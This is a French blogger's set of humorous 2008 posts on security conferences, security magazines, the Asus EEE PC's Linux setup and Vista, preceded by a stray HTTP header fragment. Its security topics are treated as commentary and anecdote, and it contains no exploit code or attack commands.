Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=fr:TM=1217162459:TS=1217162459:TZ=:VER=0/3.6.0.216/0; expires=Mon, 27-Jul-09 12:40:59 GMT; path=/; domain=.skype.com;
Content-Length: 9
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

3.8.0.139

lundi 14 juillet 2008

Il n'est toujours pas content

(Suite du message précédent, car j'ai oublié de citer quelques personnes qui me font rire - personnes morales, je vous rassure :)

  • La newsletter de mon opérateur mobile
Je me suis toujours demandé si les témoignages clients glissés dans les encarts publicitaires étaient totalement bidonnés (texte et photo), ou juste un peu. Vous voyez de quoi je veux parler : les encarts dans lesquels Michel H., 52 ans, cadre en région parisienne, se dit "accro de la 3G" par exemple.

Mon opérateur mobile fait la même chose, mais avec des stars. Ce mois-ci c'est Zazie qui s'y colle. Et je ne sais pas si c'est le service com' qui a écrit l'interview, mais en tout cas quelqu'un s'est bien raté.


  • La newsletter de ma banque
Echec également. Il s'agissait de promouvoir la banque par téléphone portable.


  • Les utilisateurs de Word
Oui les utilisateurs de Word m'exaspèrent ! Enfin les 98%[*] d'utilisateurs (ça ne vous concerne donc peut-être pas, cher lecteur :) qui se sont retrouvés avec le pack Office installé sur leur PC acheté en grande surface, et qui ont grossi la base des "utilisateurs de Word".

[*] Chiffre approximatif

Le drame, c'est qu'un document Word d'une certaine taille (pas celle d'un CV, mais celle d'un document d'analyse de risques par exemple) sans numérotation automatique, sans styles prédéfinis, sans signets et références, et autres fonctions clés du logiciel c'est juste ... impossible à modifier.

Au moins avec \LaTeX, on peut être sûr que tout utilisateur ne l'est pas devenu par hasard ... (je vous rassure, un document \LaTeX est également impossible à modifier si on ne dispose pas de tous les paquets installés sur le poste de l'utilisateur qui a compilé le document en dernier).
  • Le dernier Hakin9 sur le thème "Data Recovery"
Non en fait il n'est pas mal :) Il y a quelques articles qui tiennent tout à fait la route.

Il n'y a que deux problèmes avec ce magazine : quand ils font appel à des étudiants pour boucler, ou quand ils font appel à des étudiants pour traduire.

Dans le premier cas, ça donne des choses comme "si comme moi vous avez perdu votre table de partitions un matin en vous réveillant, vous pouvez utiliser FileRecovery Pro ou TestDisk pour récupérer vos fichiers". Sachant que le premier est un outil Windows coûtant au bas mot $100, et que le deuxième est inutilisable si Curses n'évoque pour vous qu'un sort niveau 4 à Eye of the Beholder. Aucune explication sur les principes, même généraux, de la récupération de données. Une introduction "I love Linux", suivie d'une liste de produits sous Windows. Au final, un article qui sera périmé dès que les logiciels cités auront changé de version.

(A titre personnel je recommande vivement TestDisk et PhotoRec, qui m'ont sauvé la vie plusieurs fois).

Dans le deuxième cas, ça donne des choses comme (je cite mot pour mot) :
"LDAP est un protocole qui peut être supporté par différentes technologies, telles que XML ou les bases de données traditionnelles."
Ou :
"[...] d'énormes rainbow tables qui peuvent être mis à mal avec des technologies de type torrent."
Quoique dans certains cas, on se demande si l'erreur est réellement imputable au traducteur ...

samedi 12 juillet 2008

Il revient ... et il n'est pas content !

Et oui je suis de retour après pas mal d'activités diverses. Mais j'ai aussi eu le temps de m'énerver sur l'actualité récente.

  • La "faille" DNS
Je ne m'avancerai pas sur le fait de savoir si Dan Kaminsky a trouvé une faille sérieuse dans le protocole DNS ou l'une de ses utilisations (contrairement à d'autres [1][2]). Mais en lisant les blogs, il est amusant de constater que tout le monde prétend avoir trouvé cette faille (D.J.Bernstein, Amit Klein, et même un stagiaire du SANS) ... alors qu'on ne sait même pas encore de quoi il s'agit !

Been there, done that.
  • La "qualité" de l'Open Source
Ou comment laisser un bug 33 ans dans un logiciel que tout le monde a utilisé au moins une fois (ne serait-ce qu'à l'école), à savoir YACC.
  • Le dernier MISC
Un bon opus, même si la virologie reste un sujet de laboratoire, assez loin des préoccupations actuelles des RSSI. Du coup la diversité des auteurs s'en ressent. Notez bien qu'on pourrait dire la même chose du dernier SSTIC. Mais je ne l'ai pas dit :)

Il faudra quand même que je me fasse confirmer (ou infirmer) que la traduction de l'anglais malicious est "malveillant", et non pas "malicieux". En tout cas d'après Google Translate.

Ceci dit, je n'ai jamais compris non plus la différence entre une "problématique" et un "problème", entre "un écart qui nécessite des mesures correctives rapides" et "un projet complètement planté", et toutes ces subtilités de la Novlangue.

Je réserve mon avis sur Hakin9 pour plus tard (je ne l'ai pas encore ouvert).
  • Les Call Centers
En complément à la technique du Grey Listing, la technique de l'Early Abort : si au bout de 3 secondes votre interlocuteur n'a pas dit "allo" et que vous n'entendez qu'un bruit de fond continu, RACCROCHEZ C'EST UN PIEGE ! En effet la numérotation dans les Call Centers est automatique ; lorsque la ligne décroche l'appel est transféré vers un télévendeur - ce qui induit un lag (perceptible) de 3-4 secondes.
  • La sécurité des présidents
Et oui c'est le sommet de l'Union pour la Méditérannée ce week-end. 18,000 policiers sont mobilisés. Et j'ai pris 2 PV de stationnement en 1h30. A ce prix là les terroristes vont avoir du mal à garer une voiture piégée s'ils n'ont pas pris le stationnement résidentiel !

Vive le mois d'août et sa gratuité ...

vendredi 4 juillet 2008

Appel à témoins

Désolé pour le manque d'activité sur ce blog, j'essaie de préparer des articles plus techniques que d'habitude mais c'est beaucoup plus long (mes stagiaires en savent quelquechose :).

L'objet initial de ce billet est le suivant : "j'ai un ami qui cherche des traces PCAP de communications WiFi enregistrées entre septembre 2006 et mai 2008, particulièrement lors de conférences de sécurité type SSTIC".

Si vous avez ça sous la main, vous pouvez me contacter par un commentaire.

Le plus strict anonymat sera respecté :)

lundi 9 juin 2008

YACRS'08

Et oui, Yet Another Compte-Rendu du SSTIC 2008 ...

Je ne vais pas vous embêter avec le contenu des confs, vu le nombre de billets traitant déjà du sujet (certains inaugurant le live blogging). On notera que l'effet bisounours joue à fond, difficile de trouver un billet descendant complètement une conf', comme ce fût le cas les années passées.

Parlons plutôt de l'esprit général de SSTIC, car comme dirait l'autre, "c'était mieux avant".

Une chose frappante, qui s'est transformée en blague récurrente, c'est l'absence de publication d'outils cette année. La peur du gendarme est-elle passée par là ? Il est vrai qu'ils étaient nombreux dans la salle, et a priori très compétents ...

A SSTIC, on trouvait habituellement deux types de conférences :

  • Les conférences de culture générale, sur des sujets obscurs et/ou non techniques. Cette année on pourra citer la sécurité des détecteurs de feux de forêt, ou les attaques informationnelles.
  • Les conférences techniques, sur des sujets pointus, que l'orateur est souvent le seul à avoir travaillé aussi profondément, et qui débouchent sur des découvertes ou des outils puissants. Dans le passé, il y a eu la conférence de Nicolas Pouvesle sur les RPC Windows, ou la conférence d'Aurélien Bordes sur l'authentification Windows.
Cette année, une troisième race de conférence s'est taillée la part du lion : la conférence technique, sur un sujet déjà largement connu, et dont les seules avancées (en général un outil puissant) ne sont pas destinées à être publiées. Et personnellement, je ne vois pas trop l'intérêt de jouer au meilleur debugger ou à la meilleure libdisasm ...

Je passe sur l'intervention de la DCSSI à propos de la SSI en France. Chaque planche était un troll, pour ainsi dire ...

Sinon en vrac :
  • Les treillis n'étaient pas très visibles cette année.
  • D'ailleurs on sent que le public a changé, car poser des questions semble être devenu un motif d'opprobre. Même Hervé s'est tenu à carreau devant Marcus.
  • La jeune génération arrive. Ca se voit dans les greet'z et dans les Chocapic'z.
  • L'Asus EEE 700 a bien marché en France. Vraiment.
  • mDNS, c'est pire que NetBIOS. Vraiment.
  • Mention spéciale à Nikoteen, le seul à avoir publié ses travaux sous licence 4.
En conclusion, je ne regrette jamais d'être allé au SSTIC car il y a des moments épiques (souvent nocturnes). Mais je ne reviens pas voir mon patron ce lundi matin avec beaucoup de choses à lui montrer ... Espérons qu'il me rembourse quand même le voyage !

PS. Ces propos sont librement diffusables sous licence LDP :)

samedi 31 mai 2008

Pot pourri

La semaine dernière a été chargée, pour cause d'audit. Encore un grand moment de bonheur, dont je réserve les meilleures feuilles aux amateurs de cocktails de fruits (que mon chef soit rassuré s'il me lit, aucun secret professionnel n'est trahi à cette occasion ;).

Comme je ne peux rien raconter de mes activités (contrairement à d'autres), je vais me contenter de ce que je fais le mieux, à savoir bâcher :)

  1. Tout d'abord le compte-rendu de la journée Vista du GuWiV m'a mis en joie : [...] Les "retours vers XP" représentent une frange infime des utilisateurs et relève plus du buzz geeko-journalistique que d'une réalité de terrain. [...]
  2. Toujours dans ce même compte-rendu, je tombe sur le site d'un participant émérite du groupe SharePoint France. Très Web 2.0 isn't it ?
  3. Saviez-vous qu'il existe mieux que la "fameuse" norme ISO 27001 ? Je veux parler de ISO 29147, la norme du ... responsible disclosure. On s'inscrit où pour être certifié ?
  4. Voici quelques sociétés dont je peux librement parler, puisqu'elles m'ont envoyé un authentique spam. La première c'est Ergonomiko : franchement, vous trouvez leur site ergonomique ? La deuxième (dont je tairai le nom) propose une sensibilisation à la sécurité en ligne : SecureMan.
  5. Pour ceux qui ont déjà entendu parlé de Windows Home Server (tout un concept), sachez que le système est totalement inutilisable si vous avez plus d'un disque dur. Le tout à cause de la gestion des Alternate Data Streams (comme quoi ça sert à quelque chose cette feature !). Il faut attendre le Power Pack 1 (sans rire).
Passons maintenant à mon sujet favori : les conférences de sécurité. La semaine prochaine vous aurez le choix entre SSTIC'08 et des séminaires Technet. Personnellement je me rends à SSTIC, car on m'a vendu ça :

Par la suite, un complice interne m'a signalé qu'on aurait plutôt son voisin sur les genoux cette année ...

Si vous avez encore le courage après ça, vous pouvez rempiler sur la Nuit du Hack (14/15 juin) puis HackerSpaceFest (16/22 juin). Ca fera quelques Miles en plus sur le passe Navigo ... ou pas.

PS. Inutile de me harceler par mail, le forum de "hackers" fermé par la police cette semaine, c'est celui-là (source: l'Underground).

mercredi 28 mai 2008

Compte-rendu de la JSSI 2008

La Journée Sécurité organisée par l'OSSIR (JSSI) s'est tenue jeudi dernier à Paris.

Cette année le thème était "Anonymat, vie privée et gestion d'identité". Un sujet qui ne m'évoque absolument rien, d'autant que les conférences étaient plus orientées "santé" que "Web 2.0". J'y allais donc "pour voir".

Je dois dire que grâce à des intervenants de qualité, je ne me suis pas ennuyé (même si aucun des sujets abordés ne me sera d'une quelconque utilité professionnelle immédiate). Parmi les points mémorables de la journée :

  • La plaidoirie de Maitre Bensoussan.
  • "Le secret médical, ça commence par ne pas appeler les patients par leur nom dans la salle d'attente".
  • "Le commercial était chaud comme une baraque à frites" - en parlant du Data Loss (ou Leak) Prevention, le nouveau truc à la mode. Note : contrairement aux IDS, là on est sûr dès le début qu'une solution technique de DLP n'a aucun sens.
  • "Dans une omelette au lard, la poule est concernée, mais le cochon est impliqué".
J'ai pu également noter au cours de quelques conférences récentes que le système informatique de l'éducation nationale est réellement à la pointe des nouvelles technologies. Par exemple :
  • VPN IPSEC site à site entre des milliers de sites, certains à travers des liaisons lentes et peu fiables (ex. Saint Pierre et Miquelon).
  • Hébergement de milliers de sites utilisateurs, non administrés et souvent écrits en PHP, avec 1,5 million de hits par jour.
  • Roaming WiFi à l'échelle mondiale.
  • Fédération d'identité à une échelle trans-nationale.
Ca laisse rêveur quand on voit la complexité du déploiement d'un WiFi Guest dans la plupart des grandes entreprises françaises ...

Le clou de la journée reste quand même le réseau WiFi du site (je ne parle pas du hotspot Orange, mais bien du SSID local, probablement à usage privé).

Constatant une performance anormalement basse sur la bande WiFi, je suspecte tout d'abord un problème radio ou un abus de ressources. Après un rapide monitoring du trafic ambiant, il n'en est rien : la cause du problème est une émission massive (plusieurs centaines par seconde) de requêtes ARP (identifiables par leur taille) sur le réseau local protégé en ... WEP.

Cette consommation de bande passante durant au-delà du raisonnable (plusieurs heures !), je fais le tour des rares personnes ayant un laptop sur les genoux (on n'est pas au SSTIC), puis je filtre sur le critère laptop sous Linux.

Le coupable est identifié : c'est un consultant travaillant dans une société réputée en matière de sécurité WiFi (elle est passée sur TF1, c'est dire). Non seulement ce consultant n'utilise pas AirCrack en mode -ptw, mais surtout ... il n'a jamais trouvé que la clé WEP ne faisait que 64 bits !

dimanche 25 mai 2008

Annonce légale

Je connais quelqu'un qui vend une place pour SSTIC'08, toutes options, état neuf, prix coûtant. Donc n'hésitez pas à me contacter par mail ou dans les commentaires : premier arrivé, premier servi.

PS#0 Cet article de Réseaux et Télécoms m'a bien fait rire :
Certification 27001 : Les RSSI de grands groupes disent non merci !

PS#1 Je suis toujours fasciné par cette bannière publicitaire qui tourne sur le site de SecuObs depuis quelques mois :

Who needs VPN4U Services ? Hotspot Wireless Users at risk of having personal datas stolen like passwords ! Home Internet Users, Cable and DSL providers don't filtering exploits ! International Internet Users living where Governments prevent users from enjoying Internet, USA IP = no controls ! 36 USD/year

PS#2 Je vous laisse savourer cette perle sur l'underground (un sujet à la mode en ce moment), lue dans le Hacker News Magazine de novembre dernier. Notez bien qu'il n'est pas question de Paradis du Fruit :)

lundi 19 mai 2008

"Sans la liberté de blâmer, il n'est point d'éloge flatteur"

Pas beaucoup d'activité sur ce blog en ce moment, c'est probablement signe que je prépare activement ma rump session du SSTIC [*]

Mais j'ai quand même pris le temps de lire la presse sécurité bi-mensuelle ce week-end. Et il faut bien l'admettre : le dernier Hakin9 est ... pas mal du tout !

Qu'est-ce qui a changé ? Tout ! (Y compris la mise en page d'ailleurs)

  • Les auteurs sont de langue française, c'est donc la fin des traductions hasardeuses.
  • Les auteurs sont des professionnels, ayant travaillé dans le domaine dont ils parlent. Les articles sont structurés et apportent une vraie valeur ajoutée (fini les articles d'étudiants découvrant l'injection de DLL).
  • Les fautes de style, d'orthographe et de grammaire sont beaucoup moins nombreuses. Ca n'est probablement pas le fait du comité de relecture (en tout cas il ne semblait pas y en avoir dans les précédents numéros), mais plutôt de la qualité intrinsèque des auteurs.
La seule chose qui subsiste, ce sont les publicités kitsch :)

Sur le fond, voici une revue de quelques articles phares :
  • Sécurité Oracle, par un formateur Oracle ayant travaillé plusieurs années dans cette même société. Avec des techniques (telles que l'exploration des tables v$*) qui donnent envie de lire un dossier sur la sécurité des bases de données dans MISC (le serpent de mer ...).
  • Sécurité MySQL, par un hébergeur. Plutôt orienté configuration donc, mais techniquement valable.
  • Fuite d'information via un ordinateur portable volé, un sujet à la mode qui fera plaisir à l'inventeur de l'offensics. Note : l'article est disponible en ligne sur le site de Hakin9 sous forme PDF.
  • Sécurité BlueTooth, avec des vraies captures d'écran du "fameux" logiciel FTS4BT. Ca prouve que l'auteur est au fait des dernières attaques, mais à $10,000 la licence on peut quand même se poser des questions sur la provenance de ces screenshots ;)
PS. Bon anniversaire à mon droïde préféré, à savoir :










[*] Ou la présentation de SandMan à BlackHat US 2008. Il n'y a qu'en Europe où vous n'aurez pas le droit à cette conférence, pour une raison indépendante de ma volonté ;)

dimanche 18 mai 2008

Comment passer une soirée réussie ?

L'expérience de ce week-end prouve qu'il faut respecter plusieurs critères simples, mais complètement contre-intuitifs. En voici donc la primeur :

  1. Ne rien tenter d'organiser. Celui qui organise essaie de trouver une date qui plaise à tout le monde, en général la seule où il n'est pas dispo.
  2. Prévenir les gens 2h avant la soirée, afin qu'ils ne puissent pas invoquer des prétextes fallacieux tels que "j'ai peut-être escalade".
  3. Ne pas tenter s'alimenter, sinon l'épineux problème du choix va se poser. De toute façon, dans la bière, il y a à boire et à manger.
  4. Ne donner aucune consigne stressante pour les invités, du type "apportez à manger pour un nombre de personnes compris entre 3 et 20". Statistiquement, il y aura alors 50% bière et 50% vodka, ce qui est parfait (la nature est bien faite).
  5. Ne pas inviter de jeunes. Ils boivent du Coca avec sucre.
  6. Ne pas inviter l'underground. Comme ils n'ont pas de sous, ils font leurs courses chez Leader Price.
  7. Ne pas épuiser les sujets Debian et LatexBeamer avant la fin de la première bouteille de vodka.
Attention ces critères n'ont été testés que sur des individus reconnus geeks incurables. Je décline toute responsabilité en cas d'utilisation sur un public moins averti.

dimanche 20 avril 2008

Special K.

Je dédie ce papier à un franco-américain bien connu dans le monde de la sécurité.

Pour faire court, il a été résumé ici par le SANS.

Pour faire encore plus court (et en français), les auteurs prétendent avoir créé un outil qui fabrique automatiquement, à partir des patches Microsoft, un exploit (quasiment) fonctionnel, le tout en 3 minutes.

Alors, FUD ou réalité d'après vous ? ;)

PS. J'ai quand même l'impression qu'on croûle sous les "papiers" ces derniers temps ... Un effet de bord du regain d'intérêt des universitaires pour la sécurité ?

samedi 19 avril 2008

Toujours aussi illimité ...

Il faut vraiment faire attention aux conditions d'utilisation de la fameuse "3G" dont on nous rebat les oreilles, car elles changent souvent :

Pour ceux qui n'ont pas le courage de lire :

(5) [...] Afin de permettre à tous les abonnés d'accéder à Internet dans des conditions optimales, le réseau 3G/3G+ étant mutualisé, le débit maximum de connexion sera ajusté à 128Kb/s au-delà de 1Go d'échange de données par mois, jusqu'à la prochaine date de facturation.

Ah oui j'oubliais :
100% compatible ? Je ne vais pas faire le malin avec OpenBSD ... il suffit de savoir que les clés écoulées jusqu'au début de cette année n'étaient pas compatibles Vista.

Tout cela vous semble moisi ? Et bien ils ne s'en cachent même plus maintenant :)

PS. Juste pour le troll, le prochain Asus EEE sera proposé sous Windows XP :)

vendredi 4 avril 2008

De l'utilisation intelligente du "grey listing"

C'est probablement la saison qui veut ça (avec l'approche des impôts), mais les call centers se déchainent en ce moment.

Inspiré par l'efficacité du greylisting pour lutter contre le spam courriel, j'ai décidé de le mettre en place dans ma vie de tous les jours également (même si cela risque de me rapporter moult points au geek test).

Donc je ne réponds plus au téléphone dès le premier appel : si c'est vraiment important, les correspondants rappellent immédiatement ou laissent un message.

Je n'ouvre plus ma porte non plus. Si quelqu'un sait que je suis là (par exemple parce que je lui ai donné rendez-vous), il appelle sur le portable ou sonne une deuxième fois.

Le seul problème : certains call centers appellent même au bureau désormais ! Parfois l'interlocuteur dispose d'informations qui laissent vaguement supposer d'où il tire son listing de contacts, mais j'en suis resté là pour le moment.

Il ne me reste plus qu'à militer pour faire ajouter à la charte sécurité de l'entreprise l'interdiction de décrocher son téléphone s'il n'a pas déjà sonné dans les 2 minutes précédentes - ce qui finalement est largement aussi justifiable que l'interdiction d'introduire des appareils photos encore affichée à l'entrée de nombreux sites industriels ...

Mais tout n'est pas si noir : le spam (courriel ou téléphonique) permet de s'assurer périodiquement que l'infrastructure de communication continue à fonctionner. C'est le Nagios^H^H^HMicrosoft System Center du pauvre en quelque sorte !

vendredi 28 mars 2008

Cherchez l'erreur

Pour se détendre avant le week-end :)

jeudi 20 mars 2008

Rendez moi mon écran bleu

(Suite du précédent message, toujours à propos de l'Asus EEE).

Voici une aventure à double sens.

J'essaie de me connecter à mon réseau WiFi en WPA-PSK via l'utilitaire de configuration graphique. Mon réseau est protégé par une passphrase suffisament longue, comme il se doit. Et là, c'est le drame.

Non seulement ça ne marche pas, mais le message d'erreur présente tous les symptômes d'une injection de commandes shell, bien connue dans le milieu du modem adéhaisselle[*].

Après une bonne heure de débogage, le problème est identifié. Le script /etc/network/if-pre-up.d/0001xandros-wireless-tools fait appel au script /usr/sbin/xandros-wpa-config pour générer dynamiquement la configuration wpa_supplicant.

Ces deux scripts ne protègent pas correctement la passphrase par des guillemets, ce qui provoque des erreurs inattendues lorsque la passphrase contient des espaces ... (comme toute phrase normalement constituée).

On peut tirer deux conclusions relativement différentes de cette histoire :

  • C'est beau l'Open Source, je vais avoir mon nom dans un CHANGELOG. Ah non en fait je ne sais pas comment remonter le bogue à Asus, Taiwan.
  • J'ai perdu une heure de ma vie à fixer un problème trivial. Et personne n'utilise de passphrase correcte.
Quel est le lien avec le titre de ce billet ? C'est qu'il ne faut pas changer de résolution trop souvent sur cette même machine :)


La bonne nouvelle, c'est que la version de CUPS installée n'écoute que sur l'interface de boucle locale. Cette fois-ci, ça n'est pas Sun/Solaris qui prend mais Apple/MacOS :)

[*] On dit bien cédérom, non ?

mardi 18 mars 2008

Ceci n'est pas une bâche gratuite

Pour mon anniversaire, je me suis offert le pur jouet geek : l'Asus EEE PC.

En France, il semble qu'un opérateur de téléphonie mobile ait obtenu l'exclusivité de sa distribution. Il reste toutefois possible de l'acheter sans abonnement 3G pour la modique somme de 299 euros. Avec 500,000 exemplaires vendus en France (source orale), l'objet est en rupture de stock chez pratiquement toutes les grosses enseignes.

L'objet est graphiquement séduisant, même si les marges d'écran (et son format tout en longueur) sont assez décevants. La connectique est bonne : plusieurs ports USB, port Ethernet, sortie VGA (indispensable pour les professionnels de la présentation), chipset WiFi Atheros, lecteur SD/MMC. Pas de port PCCard/PCMCIA toutefois.

Sous le capot on trouve une distribution Linux basée sur Debian : Xandros. Attention, le support est entièrement assuré par Asus. Et là, c'est le drame.

Tout le monde a lu que la version de Samba livrée et démarrée par défaut sur ce système est vulnérable à une faille exploitable à distance.

Mais ce qui est beaucoup plus intéressant, c'est que la personnalisation opérée pour le support de la clé USB 3G+ de Huawei (revendue par l'opérateur sus-mentionné) "casse" le système de packages. Aucune mise à jour n'est possible via l'interface graphique, un message d'erreur cryptique de type "try apt-get -f install" étant affiché.

Hmm, 500,000 systèmes non patchables dans la nature, ça fait réfléchir :)

Accessoirement, je n'ai jamais réussi à configurer mon accès WPA-PSK via l'interface graphique. "wpa_supplicant.conf" est ton ami.

En conclusion voici la bâche : Linux pour tous, ça n'est toujours pas pour demain, même avec des grosses icônes :)

Quelques infos pour les purs geeks : le système est livré avec Python et Ruby en standard, mais pas GCC. Le processeur est un Intel Centrino classique. L'utilisateur de base (compte "user") est également sudoer sans mot de passe. Et le support IPv6 n'est pas compilé dans le noyau :)

jeudi 13 mars 2008

6 choses sur moi

Nonop, dans son blog consacré à la sécurité, tente une action de Lutte Informatique Offensive grossière afin de me profiler plus finement.

On notera que son blog est hébergé chez Wordpress, mais cet homme n'est pas à une contradiction près, puisqu'il est à la fois consultant et expert \LaTex :)

Voici donc 6 éléments aléatoires sur moi :

  1. Comme la plupart des consultants en sécurité, j'ai (eu) pour loisirs différentes activités telles que le jeu de rôle, le paintball et les concerts de hard rock.
  2. A contrario, je considère la majorité des productions "rap" comme une musique complètement immature et infatuitée - malgré un avis contraire de tous mes collègues directs. J'ai presque plus de sympathie pour la Tectonik (bien que je ne sache toujours pas épeler ce mot correctement).
  3. Je suis au régime. Et c'est mon anniversaire bientôt (corollaire de la remarque précédente), mais je ne peux pas vous dire quand car c'est une question secrète sur de nombreux sites.
  4. J'ai déjà fait une estive dans le Vercors avec un troupeau de 3000 têtes et 13 chiens de protection, dans une zone à loups.
  5. J'ai habité 2 ans en Martinique - j'ai donc un degré de plongée sous-marine, le permis bateau hauturier (je peux conduire un super-tanker pour des trajets non-commerciaux :) et un degré en parapente.
  6. Et surtout, je déteste les chaines et les hoaxes en tout genre, qui contribuent à niveler Internet par le bas (comment faire de la sensibilisation sérieuse après ça ?). Je ne ferai donc pas suivre l'invitation à 6 malheureuses victimes :)

lundi 3 mars 2008

Echantillon gratuit

Pour ceux qui n'ont pas la chance d'être abonnés, voici un échantillon du dernier numéro de Hakin9. Enjoy!

mercredi 27 février 2008

C'est bientôt le printemps !

Tout fleurit à nouveau, et tout se renouvelle.

Par exemple la nouvelle version de ImpRec, compatible Vista 64 bits (WoW).

Ou le SP1 pour Vista, que j'ai installé sans trop de problèmes (juste un BSoD :) sur plusieurs machines, et qui a effectivement diminué la consommation mémoire de 10% et augmenté de manière sensible les performances du système de fichiers.

Ou la nouvelle maquette du Hakin9 de février, qui est arrivé ce jour dans ma boite aux lettres avec comme gros titre "failles critiques sur le protocole SSH" (rien que ça).

Ou la nouvelle maquette du prochain MISC, mais chut !

Non, ce dont je veux surtout vous parler c'est la sortie publique du projet SandMan (version 32 bits uniquement) - avec support Python pour les amateurs :) Et oui, comme nous ne sommes pas retenus au SSTIC cette année, vous n'aurez pas à attendre le mois de juin !

vendredi 22 février 2008

Microsoft x3

#1 BitLocker

Mon portable sous Vista Ultimate est chiffré avec BitLocker + TPM 1.2. Et là, c'est le drame : je dois rendre la machine d'urgence. Comment récupérer les données alors que je n'ai pas eu le temps de les déchiffrer ? Il ne me reste que le disque dur entre les mains.

A tout hasard, je branche le disque dans une machine identique. Il me demande mon mot de passe de recouvrement (que j'ai soigneusement noté à l'installation, bien m'en a pris).


Le système démarre. Je désactive BitLocker, le temps d'initialiser le nouveau TPM et de rebooter. Je réactive BitLocker et tout fonctionne parfaitement ! Avouez que vous n'y croyez pas :)

#2 Vista SP1

Le SP1 pour Vista est disponible depuis quelques jours en version finale auprès des abonnées Technet+. Bilan des courses : 1,13 Go à télécharger (pour la versions 4 langues 32 et 64 bits). Au passage le téléchargement s'effectue avec un joli ActiveX de chez Akamai. I love the smell of homemade software in the morning :)

#3 Microsoft et l'Open Source

C'est inattendu, c'est incroyable et pourtant ... tous les formats de fichiers et tous les protocoles Microsoft sont désormais disponibles publiquement et libres de droits en format PDF et XPS !

Ici les formats Office.

Ici les formats Windows.

#4 (Bonus)

Et pendant ce temps là dans l'Open Source historique.

"Selon l’organisme secunia, les problèmes sont liés aux fonctions présentes dans l’appel système fs/splice.c. Les experts divergent sur la nature plus ou moins critique du bug mais, toutefois, tous s’accordent sur la nécessité d’appliquer le patch en installant la version la plus récente du noyau."

Allez, voilà de quoi mettre les experts d'accord :)